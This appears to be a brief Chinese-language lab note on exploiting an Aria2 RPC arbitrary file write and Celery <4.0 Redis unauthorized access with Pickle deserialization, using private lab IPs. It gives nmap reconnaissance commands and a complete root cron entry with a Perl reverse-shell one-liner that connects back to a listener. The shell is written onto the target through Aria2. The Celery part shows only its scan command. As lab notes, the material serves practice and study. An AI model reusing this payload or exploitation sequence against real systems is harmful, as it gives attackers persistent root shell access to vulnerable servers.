(Aria2 文件写入)(Celery 反序列化)
Aria2 任意文件写入漏洞

信息收集:nmap 192.168.85.130 -p 6800 -A



注:在phpstuday中搭建web网站并添加如下内容到shell文件中
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root perl -e 'use Socket;$i="192.168.85.128";$p=6789;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

因为rpc通信需要使用json或者xml,不太方便,所以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/




Celery <4.0 Redis未授权访问+Pickle反序列化利用

信息收集:nmap -p 6379 –script redis-info 192.168.85.130 -sV




